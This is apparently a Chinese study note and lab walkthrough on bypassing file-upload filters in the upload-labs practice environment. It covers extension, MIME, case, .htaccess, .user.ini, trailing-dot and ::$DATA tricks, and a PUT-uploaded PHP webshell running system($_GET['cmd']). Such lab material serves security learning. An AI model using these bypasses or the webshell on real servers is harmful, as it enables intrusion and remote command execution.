思路

image-20201227112040834

upload-labs关卡

关卡
upload-labs第一关
upload-labs第二关
upload-labs第三关
upload-labs第四关
upload-labs第五关
upload-labs第六关
upload-labs第七关
upload-labs第八关
upload-labs第九关
upload-labs第十关
upload-labs第十一关
upload-labs第十二关
upload-labs第十三关
upload-labs第十四关和第十五关
upload-labs第十八关
upload-labs第二十关

php.ini文件配置上传限制

php.ini文件php7.4默认文件上传最大是2m

1
upload_max_filesize=要上传最大的文件

上发最多默认是20

1
max_file_uploads = 要可以连续发送几个

$_FILES上传参数

我们上发的文件都是用$_FILES来获得的里面有参数
print_r()来查看一下
a.html代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
<head>
<meta charset="utf-8">
<title>文件上发</title>
</head>
<body>

<form action="a.php" method="post" enctype="multipart/form-data">
    <label for="file">要上发的文件名:</label>
    <input type="file" name="wj" id="file"><br>
    <input type="submit" name="submit" value="点击提交">
</form>

</body>
</html>

a.php代码

1
2
<?php
    print_r($_FILES)

$_FILES是一个数组他保留这上传文件信息

burp抓包

image-20220127151624598

可以看见数组


我们就可以单独的数组进行显示

1
2
3
4
5
$_FILES["file"]["name"] - 被上传文件的名称
$_FILES["file"]["type"] - 被上传文件的类型
$_FILES["file"]["size"] - 被上传文件的大小,以字节计
$_FILES["file"]["error"] - 由文件上传导致的错误代码0是就是没有报错
$_FILES["file"]["tmp_name"] - 存储在服务器的文件的临时副本的名称

我们就可以写个a.php代码为

1
2
3
4
5
6
7
<?php 
    echo "上传:" . $_FILES["wj"]["name"] . "<br />";
    echo "类型:". $_FILES["wj"]["type"] . "<br />";
    echo "大小: ". $_FILES["wj"]["size"] . "<br />";
    echo "报错代码:". $_FILES["wj"]["error"]."<br />";
    echo "存储在: " . $_FILES["wj"]["tmp_name"];
?>

结果

文件移动

move_uploaded_file()函数
这个函数有两个参数

第一个猜数 必需。规定要移动的文件。

第二个参数 必需。规定文件的新位置。
a.html代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
<head>
<meta charset="utf-8">
<title>文件上发</title>
</head>
<body>

<form action="a.php" method="post" enctype="multipart/form-data">
    <label for="file">要上发的文件名:</label>
    <input type="file" name="wj" id="file"><br>
    <input type="submit" name="submit" value="点击提交">
</form>

</body>
</html>

a.php代码

1
2
3
4
5
<?php 
    $a="C:\phpstudy_pro\WWW\sq\a.png";
    move_uploaded_file($_FILES["wj"]["tmp_name"],$a);
    echo "文件在".$a;
?>

安全上发文件

is_uploaded_file()函数
里面有一个参数必填,是文件名
如果 file 所给出的文件是通过 HTTP POST 上传的则返回 TRUE。

该函数可以用于确保恶意的用户无法欺骗脚本去访问本不能访问的文件,例如 /etc/passwd。

这种检查显得格外重要,如果上传的文件有可能会造成对用户或本系统的其他用户显示其内容的话。

1
2
is_uploaded_file($_FILES["wj"]["tmp_name"])

教程看的https://www.bilibili.com/video/BV1K741147FY里面的有很多没有说直接绕过了就很烦,但是这个教程内容很丰富。教程里面修改东西的我也不知道什么意思他也不说就很烦,我就自己百度找然后都写到笔记里面了

文件上传绕过思路在这个地方找到https://www.bilibili.com/read/cv6978946/

image-20201227112040834

PUT 方法文件上发

判断目标开没有开启PUT 方法

向指定资源位置上传其最新内容

PUT请求的说明

http有八种请求方法

HTTP1.0定义了三种请求方法: GET, POST 和 HEAD方法。

HTTP1.1新增了五种请求方法:OPTIONS, PUT, DELETE, TRACE 和 CONNECT 方法

PUT方法可以向指定资源位置上传其最新内容

HTTP PUT方法最早目的用于文件管理操作,可以对网站服务器中的文件实现更改删除的更新操作,该方法往往可以导致各种文件上传漏洞,造成严重的网站攻击事件

开启PUT

打开Apache配置文件httpd.conf,在上面添加

找到下面的然后叫注释去掉,加载modules/mod_dav.somodules/mod_dav_fs.so模块

LoadModule加载特定的DSO模块

1
2
#LoadModule dav_module modules/mod_dav.so
#LoadModule dav_fs_module modules/mod_dav_fs.so

image-20201224204819759

<Directory />添加DAV On

image-20201224204845178

在配置文件的最上面添加,注意一点要最上面

1
DavLockDB C:\phpStudy\PHPTutorial\WWW\a

image-20201224205715704

然后重启服务

image-20201224205814859

查看有没有开启PUT请求

下面查看有什么方法里面是没有写PUT的请求的

官方说明:HTTP 的 OPTIONS 方法 用于获取目的资源所支持的通信选项

可以用options可以获得服务器支持的所有HTTP方法

在终端输入

1
telnet 服务器ip 端口

然后在输入

1
2
OPTIONS / HTTP/1.1
Host: 192.168.1.138:8017

image-20201224211627382

用nc也可以

image-20201224212126057

用nikto可以探测对方是否开启了PUT方法

nikto -h 目标地址tomcat” password=”s3cret

image-20220202154858333

PUT的响应

如果目标资源不存在,并且PUT方法成功创建了一个,那么源头服务器必须返回201( Created)来通知客户端资源已经创建。

1
2
HTTP/1.1 201 Created
Content-Location: /new.html

如果目标资源已经存在,并且按照请求中封装的表现形式进行了成功更新,那么,源头服务器必须返回200( OK) 或者204( No Content) 来表示请求的成功完成。

1
2
HTTP/1.1 204 No Content
Content-Location: /existing.html

OPTIONS / HTTP/1.1
Host: 目标地址

用PUT请求上发文件

用burp发起PUT请求上发webshell到/a/a.php

1
2
3
4
5
6
PUT /a/a.php HTTP/1.1
Host: 192.168.31.160

<?php
system($_GET['cmd']);
?>

可以看见返回的是201

image-20201225192556437

我们访问执行命令

可以看见执行了命令

image-20201225193001865

前端检查绕过

删除前端代码绕过

有web服务器,文件上发检查只在前端js来检查,如检查文件后缀名来判断上发的文件

upload-labs第一关

比如upload-labs第一关

下面是他的源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

我们直接发送.php文件

image-20201224115337934

看一下页面源代码

image-20201224114822127

他会调用 checkFile()函数

image-20201224115024388

我们只需要叫html的调用的标签删除就可以了

image-20201224115121029

我把他删除

image-20201224115144045

然后我们发照片

上传成功

image-20201224115220757

image-20201224115234776

修改文件名绕过

比如upload-labs的第一关

上发一个phpinfo.php文件里面内容

1
2
3
4
<?php
echo phpinfo();

?>

我们叫.php文件改成.png格式

image-20201226181232127

改成png

image-20201226181407983

用burp抓一下

image-20201226181518539

叫文件名改.php

image-20201226181616786

可以看见文件上传成功

image-20201226181657727

访问地址

image-20201226181715424

大小写绕过

比如对方服务器过滤了很多后缀的文件但是没有过大小写

我写了一个简单的验证是不是php文件

代码

a.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
<body>
 
    <form action="a.php" method="post" enctype="multipart/form-data">
        <input type="file" name="wj" id="file"><br>
        <input type="submit" name="submit" value="点击提交">
    </form>

</body>
</html>

a.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php 
    header("Content-type: text/html; charset=utf-8"); //设置utf-8编码
    $b=$_FILES["wj"]["name"]; //获取传的文件的名字
    $c=explode('.',$b)[1];//获得.后面的字符串

    if($c=='php'){ //判断是不是php
        echo "请不要上传php文件";
    }else{
        echo "w文件名字".$b.'<br/>'; //打印文件名字
        $a=".\\Upload\\".$b; 

         //$_FILES["file"]["tmp_name"] - 存储在服务器的文件的临时副本的名称
        move_uploaded_file($_FILES["wj"]["tmp_name"],$a); //保存到Upload文件夹里面
        echo "文件在".$a.'<br/>';
    }
?>

我们上传一个php文件

结果

image-20220127160017597

我们就可以用大小写绕过下面我叫phpinfo.php文件改成phpinfo.Php

image-20220127160155489

upload-labs第六关

这个我测试过linux好像不行

看一下源代码:可以看见没有叫上传的文件名转换小写没有过滤大小写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

我们就可以用大小写绕过下面我叫phpinfo.php文件改成phpinfo.Php

文件内容

1
<?php echo phpinfo();?>

上传

image-20220128154744400

文件类型绕过

application/x-php是mime类型

下面是在百度上找到文件类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*.php  		application/x-php
*.gif            image/gif    
*.html    text/html    
*.jpeg    image/jpeg
*.jpg          image/jpeg    
*.js       text/javascript, application/javascript    
*.mp3    audio/mpeg    
*.mp4    audio/mp4, video/mp4    
*.pdf    application/pdf    
*.png    image/png    
*.ppt    application/vnd.ms-powerpoint    
*.txt           text/plain    
*.xml    text/xml, application/xml    
*.zip            aplication/zip

下面这个照片的括住的就是文件的类型

1
Content-Type: image/png

Content-Type:字段就是指定文件类型的
image/png就是png类型的

image-20201226182236835

文件类型可以用mimetype命令来查看

格式 

1
mimetype 要查看的文件名

1
mimetype phpinfo.php

image-20201226190032426
如果我们叫php文件名改成png用mimetype命令检查还是显示php类型

下面我叫phpinfo.php文件改成phpinfo.png文件

image-20201226190817584

mimetype来检查

可以看见还是php类型

image-20201226190958336

upload-labs第二关

演示在比如upload-labs的第二关

上发一个phpinfo.php文件里面内容

1
<?php echo phpinfo();?>

他就会报文件类型不正确

image-20201226183750686

用burp抓包叫文件名改成png

image-20201226183934420

发现还是文件上传不正确

image-20201226184048804

在选择一个php文件上传

用burp抓包,然后我们叫修改文件的类型改成image/png 就是png类型

image-20201226184146860

然后文件上传成功

image-20201226184427789

image-20201226184443032

黑名单绕过

参考https://zhuanlan.zhihu.com/p/54596666

比如不允许上传的格式后缀,asp php jsp aspx cgi war 等

如果php phtml..没有定义到后名单里,可以用这格式绕过限制,依旧可以达到效果

Web系统可能会采用黑名单的方式进行过滤。而过滤的方式存在一定的缺陷,比如存在过滤的黑名单不全,未考虑大小写,以及对上传文件名单次进行敏感字符清除

语言可解析后缀:这个要看目标的配置要有没有配置了没有配置上传也没有用

1
2
3
4
|:--|:--|
|asp/aspx|asp,aspx,asa,asax,ascx,ashx,asmx,cer,aSp,aSpx,aSa,aSax,aScx,aShx,aSmx,cEr|
|php|php,php5,php4,php3,php2,pHp,pHp5,pHp4,pHp3,pHp2,html,htm,phtml,pht,Html,Htm,pHtml|
|jsp|jsp,jspa,jspx,jsw,jsv,jspf,jtml,jSp,jSpx,jSpa,jSw,jSv,jSpf,jHtml|

这个phpstudy2018的可以phpstudy_pro不行

修改配置文件httpd.conf文件这<IfModule mime_module>.......</IfModule>

注释去掉添加自己要添加的

image-20220128143305845

upload-labs第三关

演示在比如upload-labs第三关

演示

看一下源代码,可以没有没有过滤php5,php4,php3,php2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

phpinfo.php5文件内容

1
<?php phpinfo(); ?>

上传

image-20220128144117016

文件上传之 .htaccess文件

.htaccess文件介绍

htaccess是超文本访问(Hypertext Access)的缩写,是一个基于Apache的Web服务器使用的配置文件,他会控制它所在的目录以及该目录下的所有子目录

通过 htaccess 文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

htaccess他在那目录都可以有这个文件,他会在当前目录生效

.htaccess这个文件是伪静态文件,一个网站明明是.php你会发现他的是.html,他会修改解析的规则

代码:下面代码意思就是,会吧aaaa.jpg当做成php来解析

1
2
3
<FilesMatch "aaaa.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

upload-labs第四关

linux 好像可以宝塔我测试了不知道什么原因不行

演示在比如upload-labs的第四关

代码:可以看见过滤的东西非常多但是就是没有过滤.htaccess文件,我们就上传.htaccess

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

我创建一个.htaccess文件内容,下面代码意思就是,会吧phpinfo.jpg当做成php来解析

1
2
3
<FilesMatch "phpinfo.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

phpinfo.jpg文件内容

1
<?php phpinfo(); ?>

叫.htaccess文件上传上去

image-20220127224109611

可以看见上传成功

image-20220127224450837

叫phpinfo.jpg文件上传上去

image-20220127224109611

然后我们访问phpinfo.jpg,会吧phpinfo.jpg`当做成php来解析

image-20220127224845051

文件上传之.user.ini文件上传

参考https://blog.csdn.net/u014029795/article/details/117252533

参考https://www.freebuf.com/articles/web/287193.html

.user.ini文件介绍

php.ini是php的全局配置文件,对整个web服务起作用,.user.ini和.htaccess都是目录的配置文件,.user.ini是用户自定义的php.ini,通常构造后门和隐藏后门

这一关和04.htaccess文件相似,.user.ini配置文件和.htaccess文件相似,.htaccess可以覆盖apache的配置文件,.user.ini则可以覆盖php.ini的配置

.htaccess:apahce能用,不能用于iisnginx等中间件

.user.ini和.htaccess都是目录的配置文件

.user.ini的有两个配置,可以用来制造后门

auto_append_file和auto_prepend_file官方文档https://www.php.net/manual/zh/ini.list.php

  1. auto_append_file:指定在主文件之后自动解析的文件。 该文件被包含
  2. auto_prepend_file:指定在主文件之前自动解析的文件。 该文件被包含

他们类似require调研其他文件代码使用,载入文件时,它会作为PHP文件的一部分被执行,

我们访问php文件他就会当做php文件执行

image-20220128152037666

.user.ini两个配置,其中一个就可以

1
2
3
auto_prepend_file = a.jpg         //调研a.jpg文件代码使用,包含在文件头
auto_append_file = a.jpg          //调研a.jpg文件代码使用,包含在文件尾
我们访问php文件他就会当做php文件执行调研a.jpg文件代码

upload-labs第五关

用nginx软件服务器

我们看一下关卡提示他说有一个readme.php文件

image-20220128153354738

看一下源代码:他并没有过滤.user.ini文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

创建.user.ini文件内容

1
auto_prepend_file=aaaaa.jpg //调研aaaaa.jpg文件代码使用,包含在文件头

aaaaa.jpg文件内容

1
<?php phpinfo(); ?>

上传aaaaa.jpg文件:可以看见是不能执行的

image-20220128154330568

我们上传.user.ini

image-20220128154429254

我们就可以访问readme.php他会.user.ini配置文件

可以看见aaaaa.jpg里面的代码被执行了

image-20220128154744400

空格绕过

windows等系统下文件后缀加空格命名之后是默认自动删除空格,我们就可以利用这个特性绕过验证

upload-labs第七关

linux 好像不行我测试linux靶场不行

演示在比如upload-labs第七关

看一下源代码:没有删除空格的特性,就是没有过滤空格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

我们上传文件phpinfo.php,用burp抓包修改值:后面添加上空格

image-20220128164839703

上传成功

image-20220128164952677

可以看见上传后的文件空格已经被删除了

image-20220128165506647

访问

image-20220127191609964

点绕过

同空格绕过原理一样,主要原因是windows等系统默认删除文件后缀的.和空格我们就可以利用这个特性绕过验证

upload-labs第八关

linux 好像不行我测试linux靶场不行

看一下源代码:可以看见他没有过滤.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

我们上传文件phpinfo.php,用burp抓包修改值:后面添加上.

image-20220128165852389

可以看见上传后的文件空格已经被删除了

image-20220128165506647

访问

image-20220127191609964

::$DATA上传

参考https://blog.csdn.net/weixin_44032232/article/details/109005766

在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名

例如:"phpinfo.php::$DATA"Windows会自动去掉末尾的::$DATA变成"phpinfo.php"

据我了解

参考https://www.codenong.com/cs106798969/

参考https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams

参考https://owasp.org/www-community/attacks/Windows_alternate_data_stream

NTFS 文件系统包括对备用数据流的支持。这不是一个众所周知的功能,主要是为了提供与 Macintosh 文件系统中的文件的兼容性。备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在 Windows 中,此默认数据流称为:$DATA

Windows 资源管理器不提供查看文件中有哪些备用数据流的方法(或在不删除文件的情况下删除它们的方法),但可以轻松创建和访问它们。因为它们很难找到,所以黑客经常使用它们来隐藏他们已经入侵的机器上的文件(可能是 rootkit 的文件)。备用数据流中的可执行文件可以从命令行执行,但它们不会显示在 Windows 资源管理器(或控制台)中。有关创建和访问备用数据流的信息,请参考示例 1

从 Windows shell 命令行指定时,流的全名是“文件名:流名称:流类型”,如以下示例所示:“myfile.dat:stream1:$DATA”。

任何对文件名合法的字符对流名也合法,包括空格。有关详细信息,请参阅命名文件。流类型(也称为属性类型代码)在 NTFS 文件系统内部。因此,用户不能创建新的流类型,但他们可以打开现有的 NTFS 文件系统类型。流类型说明符值始终以美元符号 ($) 开头。请参阅下面的流类型列表。

默认情况下,默认数据流是未命名的。要完全指定默认数据流,请使用“文件名::$DATA”,其中 $DATA 是流类型。这相当于“文件名”。您可以使用文件命名约定在文件中创建命名流。请注意,“$DATA”是合法的流名称。例如,名为“ sample ”的文件上名为“$DATA”的流的全名将是“ sample :$DATA:$DATA”。如果您在同一个文件上创建了一个名为“bar”的流,它的全名将是“ sample :bar:$DATA”。

创建和使用具有单字符名称的文件时,请在文件名前加上句点,后跟反斜杠 (.),或使用完全限定的路径名。这样做的原因是 Windows 将单字符文件名视为驱动器号。当使用相对路径指定驱动器号时,冒号将驱动器号与路径分开。当单字符名称是驱动器号还是文件名存在歧义时,如果冒号后面的字符串是有效路径,Windows 会假定它是驱动器号,即使驱动器号无效也是如此

Windows ::$DATA绕过只能用于Windows,Windows下NTFS文件系统有一个特性,即NTFS文件系统在存储数据流的一个属性DATA时,是请求a.php本身的数据。如果a.php还包含了其他的数据流,比如a.php:lake2.php,请求a.php:lake2.php::$DATA,则是请求a.php中的流数据lake2.php的流数据内容。简单来说,就是在数据后面加上::$DATA实现绕过,fox.php::$DATA返回fox.php数据

显示代码绕过访问 :$DATA 备用数据流:

  • http://www.alternate-data-streams.com/default.asp::$DATA

在易受攻击的版本中,IIS 将此文件的扩展名解析为 asp::$DATA,而不是 ASP。因此,与 ASP 扩展关联的应用程序没有被调用,并且攻击者可以查看 ASP 源代码

这道题利用的是Windows下NTFS文件系统的一个特性,即NTFS文件系统的存储数据流的一个属性 ![DATA。当我们访问 a.asp::](https://math.jianshu.com/math?formula=DATA。当我们访问 a.asp%3A%3A)DATA 时,就是请求 a.asp 本身的数据

upload-labs第九关

演示在比如upload-labs的第九关

这个只能windows可以

源代码:可以看见没有::$DATA过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

我们上传一个文件用burp抓包

叫原来的phpinfo.php改成phpinfo.php::$DATA

image-20220127191243052

上传成功

image-20220127191425102

我们访问叫后面的::$DATA去掉

image-20220127191524718

image-20220127191609964

看一下

上传的文件

image-20220127191657801

多写绕过

同空格绕过原理一样,主要原因是windows等系统默认删除文件后缀的.和空格我们就可以利用这个特性绕过验证

这个名字是我自己想的

这个意思就是比如目标服务器上传的时候回删除比如我们的空格和点,我们就没有办法上传点了来绕过了,其实是可以用多点,应为他只删除一次,我们就可以多写绕过

upload-labs第十关

我们看一下源代码

第7行$file_name = deldot($file_name);

第八行$file_ext = strrchr($file_name, ‘.’); //删除文件名末尾的点

第十一行 $file_ext = trim($file_ext); //首尾去空 他会删除一次文件的名字后面的空格

也就是他会删除空格但是他只会删除一次

我们就可以后面添加点空格点他会删除空格,那最后的点就不会删除

  • 我们上传a.php. .最后他会变成a.php.

同空格绕过原理一样,主要原因是windows等系统默认删除文件后缀的.和空格我们就可以利用这个特性绕过验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

